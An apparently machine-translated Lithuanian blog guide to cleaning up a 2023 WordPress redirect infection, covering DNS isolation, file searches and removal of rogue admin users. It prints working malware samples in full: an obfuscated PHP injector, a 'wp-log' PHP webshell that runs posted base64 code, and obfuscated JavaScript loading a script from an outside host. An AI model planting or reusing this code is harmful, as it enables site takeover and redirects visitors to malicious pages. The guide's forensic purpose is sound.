Fix Redirect WordPress Hack 2023 (Virus Redirect)

WordPress tai tikrai dažniausiai naudojama platforma CMS (Content Management System) tiek tinklaraščiams, tiek pradedančioms internetinėms parduotuvėms (su moduliu WooCommerce), todėl jis yra labiausiai nukreiptas kompiuterinių atakų (įsilaužimų). Viena iš dažniausiai naudojamų įsilaužimo operacijų yra nukreipti pažeistą svetainę į kitus tinklalapius. Redirect WordPress Hack 2023 yra palyginti nauja kenkėjiška programa, dėl kurios visa svetainė nukreipiama į šlamšto tinklalapius arba gali užkrėsti vartotojų kompiuterius.

Jei jūsų svetainė buvo sukurta WordPress yra nukreipiamas į kitą svetainę, tada greičiausiai tai yra jau žinomo peradresavimo įsilaužimo auka.

Šiame vadove rasite reikalingos informacijos ir naudingų patarimų, kaip išvalyti peradresavimu užkrėstą svetainę WordPress Hack (Virus Redirect). Komentaruose galite gauti papildomos informacijos arba paprašyti pagalbos.

Kuprinai

Viruso, kuris nukreipia svetaines, aptikimas WordPress

Staigus ir nepagrįstas svetainės lankomumo sumažėjimas, užsakymų skaičiaus (internetinių parduotuvių atveju) ar pajamų iš reklamos sumažėjimas yra pirmieji požymiai, kad kažkas negerai. Aptikimas "Redirect WordPress Hack 2023” (Viruso peradresavimas) taip pat gali būti atliktas „vizualiai“, kai atidarote svetainę ir esate nukreipiami į kitą tinklalapį.

Remiantis patirtimi, dauguma žiniatinklio kenkėjiškų programų yra suderinamos su interneto naršyklėmis: Chrome, Firefox, Edge, Opera. Jei esate kompiuterio vartotojas Mac, šie virusai naršyklėje tikrai nematomi Safari. Apsaugos sistema nuo Safari tyliai blokuoti šiuos kenkėjiškus scenarijus.

Ką daryti, jei svetainė užkrėsta Redirect WordPress Hack

Tikiuosi, kad pirmas žingsnis yra nepanikuoti ir neištrinti svetainės. Net užkrėstų ar virusinių failų iš pradžių nereikėtų ištrinti. Juose yra vertingos informacijos, kuri gali padėti suprasti, kur yra saugumo pažeidimas ir kas paveikė virusą. Modus operandi.

Uždarykite svetainę viešai.

Kaip uždaryti virusų svetainę lankytojams? Paprasčiausias yra naudoti DNS tvarkyklę ir ištrinti „A“ (domeno pavadinimo) IP arba apibrėžti neegzistuojantį IP. Taigi svetainės lankytojai bus apsaugoti nuo to redirect WordPress hack dėl kurių jie gali patekti į virusų ar SPAM tinklalapius.

Jei naudojate CloudFlare kaip DNS valdytojas, jūs prisijungiate prie paskyros ir ištrinate DNS įrašus "A“ domeno vardui. Taigi viruso paveiktas domenas liks be IP, nebebus pasiekiamas iš interneto.

Nukopijuoji svetainės IP adresą ir „nukreipi“ taip, kad tik jūs galėtumėte prieiti prie jo. Iš savo kompiuterio.

Kaip pakeisti tikrąjį svetainės IP kompiuteriuose Windows?

Šis metodas dažnai naudojamas blokuoti prieigą prie tam tikrų svetainių, redaguojant „hosts“ failą.

1. Jūs atidarote Notepad arba kita teksto rengyklė (su teisėmis administrator) ir redaguoti failąhosts“. Jis įsikūręs:

C:\Windows\System32\drivers\etc\hosts

2. „Hosts“ faile pridėkite „maršrutą“ prie tikrojo savo svetainės IP. IP ištrintas aukščiau iš DNS tvarkyklės.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Išsaugokite failą ir naršyklėje eikite į svetainę.

Jei svetainė neatsidaro, o „hosts“ faile nepadarėte nieko blogo, greičiausiai tai yra DNS talpykla.

Norėdami išvalyti DNS talpyklą operacinėje sistemoje Windows, atviras Command Prompt, kur paleidžiate komandą:

ipconfig /flushdns

Kaip pakeisti tikrąjį svetainės IP kompiuteriuose Mac / MacKnyga?

Kompiuterių vartotojams Mac šiek tiek paprasčiau pakeisti tikrąjį svetainės IP.

1. Atidarykite paslaugų programą Terminal.

2. Vykdykite komandinę eilutę (paleisti reikalingas sistemos slaptažodis):

sudo nano /etc/hosts

3. Tas pats kaip ir kompiuteriams Windows, pridėkite tikrąjį domeno IP.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Išsaugokite pakeitimus. Ctrl+X (y).

Po to, kai „nukreipėte“, esate vienintelis asmuo, galintis pasiekti užkrėstą svetainę Redirect WordPress Hack.

Pilna svetainės atsarginė kopija – failai ir duomenų bazė

Net jei jis yra užkrėstas "redirect WordPress hack“, rekomenduojama pasidaryti bendrą visos svetainės atsarginę kopiją. Failai ir duomenų bazė. Galbūt taip pat galite išsaugoti vietinę abiejų failų kopiją public / public_html taip pat duomenų bazėje.

Užkrėstų ir modifikuotų failų identifikavimas Redirect WordPress Hack 2023

Pagrindiniai tiksliniai failai WordPress yra index.php (šaknyje), header.php, index.php Şi footer.php temos WordPress turto. Rankiniu būdu patikrinkite šiuos failus ir nustatykite kenkėjišką kodą arba kenkėjiškos programos scenarijų.

2023 m. virusasRedirect WordPress Hack“ įdėta index.php formos kodas:

(Nerekomenduoju naudoti šių kodų!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Iššifruota, tai kenkėjiškas scenarijus tai iš esmės yra svetainės užkrėsta pasekmė WordPress. Tai ne scenarijus, esantis už kenkėjiškos programos, o scenarijus, leidžiantis peradresuoti užkrėstą tinklalapį. Jei iššifruosime aukščiau pateiktą scenarijų, gausime:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Norint identifikuoti visus serveryje esančius failus, kuriuose yra šis kodas, verta turėti prieigą SSH į serverį, kad paleistumėte failų tikrinimo ir valdymo komandų eilutes Linux.

Susiję: Kaip sužinoti, ar jūsų tinklaraštis užkrėstas, ar ne, padedant Google Search . (WordPress Virusas)

Žemiau yra dvi komandos, kurios neabejotinai padeda nustatyti neseniai pakeistus failus ir failus, kuriuose yra tam tikras kodas (eilutė).

Kaip matai toliau Linux PHP failai pasikeitė per pastarąsias 24 valandas ar kitą laikotarpį?

Įsakymas "find“ yra labai paprasta naudoti ir leidžia tinkinti, kad būtų galima nustatyti laikotarpį, paieškos kelią ir failų tipą.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

Išvestyje gausite informaciją apie failo modifikavimo datą ir laiką, rašymo / skaitymo / vykdymo teises (chmod) ir kuriai grupei / vartotojui jis priklauso.

Jei norite patikrinti daugiau dienų, pakeiskite reikšmę "-mtime -1“ arba naudokite „-mmin -360“ minutes (6 valandas).

Kaip ieškoti kodo (eilutės) PHP, Java failuose?

Komandų eilutė „rasti“, leidžianti greitai rasti visus PHP arba Java failus, kuriuose yra tam tikras kodas, yra tokia:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Komanda ieškos ir parodys failus .php Şi .js kuriame yra "uJjBRODYsU".

Dviejų aukščiau pateiktų komandų pagalba labai lengvai sužinosite, kurie failai buvo neseniai modifikuoti ir kuriuose yra kenkėjiškų programų kodas.

Pašalina kenkėjišką kodą iš modifikuotų failų, nepažeidžiant teisingo kodo. Pagal mano scenarijų kenkėjiška programa buvo įdėta prieš atidarant <head>.

Vykdant pirmą komandą "rasti" labai įmanoma serveryje aptikti naujų failų, kurie nėra jūsų WordPress nei tu ten įdėjęs. Failai, priklausantys viruso tipui Redirect WordPress Hack.

Pagal mano tirtą scenarijų failai formos „wp-log-nOXdgD.php“. Tai yra „spawn“ failai, kuriuose taip pat yra kenkėjiškų programų kodo, kurį virusas naudoja peradresavimui.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

" tipo failų paskirtiswp-log-*“ yra paskleisti peradresavimo įsilaužimo virusą į kitas serveryje esančias svetaines. Tai kenkėjiškų programų kodas, tokio tipowebshell“ sudarytas iš a pagrindinis skyrius (kuriame apibrėžti kai kurie užšifruoti kintamieji) ir o vykdymo skyrius per kurį užpuolikas bando įkelti ir paleisti sistemoje kenkėjišką kodą.

Jei yra kintamasis POST pavadintas 'bh“ ir jo užšifruota vertė MD5 yra lygus "8f1f964a4b4d8d1ac3f0386693d28d03“, tada pasirodo, kad scenarijus rašo užšifruotą turinį base64 kito kintamojo, vadinamo 'b3“ laikinajame faile ir bando įtraukti šį laikinąjį failą.

Jei yra kintamasis POST arba GET pavadintas 'tick“, scenarijus atsakys su verte MD5 iš stygos"885".

Norėdami identifikuoti visus serverio failus, kuriuose yra šis kodas, pasirinkite eilutę, kuri yra įprasta, tada paleiskite komandą "find“ (panašus į aukščiau pateiktą). Ištrinkite visus failus, kuriuose yra šis kenkėjiškos programos kodas.

Saugumo trūkumas, kurį išnaudojo Redirect WordPress Hack

Greičiausiai šis peradresavimo virusas atvyksta per administravimo vartotojo išnaudojimas WordPress arba identifikuojant a pažeidžiamas papildinys kuri leidžia pridėti vartotojų, turinčių privilegijas administrator.

Daugeliui svetainių, sukurtų platformoje WordPress tai yra įmanoma redaguoti temos ar papildinio failusiš administravimo sąsajos (Dashboard). Taigi, kenkėjiškas asmuo gali pridėti kenkėjiškos programos kodą prie temos failų, kad sukurtų aukščiau nurodytus scenarijus.

Tokio kenkėjiškų programų kodo pavyzdys yra šis:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript identifikuotas temos antraštėje WordPress, iškart atidarius etiketę <head>.

Gana sunku iššifruoti šį „JavaScript“, tačiau akivaizdu, kad jis ieško kito žiniatinklio adreso, iš kurio greičiausiai paima kitus scenarijus failams sukurti.wp-log-*“, apie kurį kalbėjau aukščiau.

Raskite ir ištrinkite šį kodą iš visų failų PHP paveiktas.

Kiek supratau, šis kodas buvo pridėta rankiniu būdu naujas vartotojas, turintis administratoriaus teises.

Taigi, norint išvengti kenkėjiškų programų pridėjimo iš prietaisų skydelio, geriausia išjungti redagavimo parinktį WordPress Temos / papildiniai iš prietaisų skydelio.

Redaguoti failą wp-config.php ir pridėkite eilutes:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Atlikus šį pakeitimą, joks vartotojas WordPress nebegalėsite redaguoti failų iš prietaisų skydelio.

Patikrinkite vartotojus su vaidmeniu Administrator

Žemiau yra SQL užklausa, kurią galite naudoti norėdami ieškoti vartotojų, kurių vaidmuo administrator platformoje WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Ši užklausa pateiks visus lentelėje esančius vartotojus wp_users kuris paskyrė vaidmenį administrator. Užklausa taip pat atliekama dėl lentelės wp_usermeta ieškoti meta 'wp_capabilities“, kuriame yra informacijos apie vartotojo vaidmenis.

Kitas būdas yra juos atpažinti iš: Dashboard → Users → All Users → Administrator. Tačiau yra praktikos, pagal kurias vartotojas gali būti paslėptas prietaisų skydelio skydelyje. Taigi, geriausias būdas pamatyti vartotojusAdministrator"Be WordPress yra aukščiau pateikta SQL komanda.

Mano atveju duomenų bazėje identifikavau vartotoją vardu "wp-import-user“. Gana įtaigiai.

WP kenkėjiška programa, blogas vartotojas

Taip pat iš čia galite matyti datą ir laiką, kada vartotojas WordPress buvo sukurtas. Vartotojo ID taip pat labai svarbus, nes jis ieško serverio žurnaluose. Taip galite matyti visą šio vartotojo veiklą.

Ištrinti vartotojus su vaidmeniu administrator ko tu tada nežinai pakeisti slaptažodžius visiems administraciniams vartotojams. Redaktorius, Autorius, Administrator.

Pakeiskite SQL duomenų bazės vartotojo slaptažodį paveiktos svetainės.

Atlikus šiuos veiksmus, svetainė gali būti paleista iš naujo visiems vartotojams.

Tačiau atminkite, kad tai, ką pateikiau aukščiau, yra vienas iš galbūt tūkstančių scenarijų, kai svetainė yra užkrėsta Redirect WordPress Hack 2023 metais.

Jei jūsų svetainė buvo užkrėsta ir jums reikia pagalbos arba turite klausimų, atidarytas komentarų skyrius.